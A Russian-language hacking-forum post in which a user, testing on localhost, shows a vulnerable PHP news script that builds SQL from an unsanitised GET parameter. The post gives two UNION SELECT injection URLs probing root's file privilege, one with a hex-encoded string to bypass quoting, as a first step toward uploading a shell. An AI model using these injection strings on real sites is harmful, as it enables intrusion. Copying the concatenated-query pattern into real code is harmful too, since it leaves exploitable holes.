Тема: Ваши вопросы по уязвимостям.
Показать сообщение отдельно

  #7  
Старый 21.10.2012, 18:32
WendM
Познающий
Регистрация: 29.01.2012
Сообщений: 44
С нами: 7519286

Репутация: 3
По умолчанию
Тестирую на локалке метод залива шелла через sql inj.

Уязвимый php

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]Новость №"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$line[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"
"[/COLOR][COLOR="#007700"];

}

exit;

}

[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT text FROM news WHERE id= "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]);

print[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];

 while ([/COLOR][COLOR="#0000BB"]$line[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]MYSQL_ASSOC[/COLOR][COLOR="#007700"])) {

 print[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];

 foreach ([/COLOR][COLOR="#0000BB"]$line[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$col_value[/COLOR][COLOR="#007700"]) {

 print[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$col_value[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"];

 }

 print[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];

 }

 print[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]mysql_free_result[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]mysql_close[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$link[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR] 
Делаю запрос

Код:
http://localhost/mynews.php?id=1+union+select+file_priv+from+mysql.user+where+user='root'+--+
Вылетают ошибки.

Делаю так

Код:
http://localhost/mynews.php?id=1+union+select+file_priv+from+mysql.user+where+user=0x27726F6F7427+--+
Выводится First news

Что не так делаю?
 
Ответить с цитированием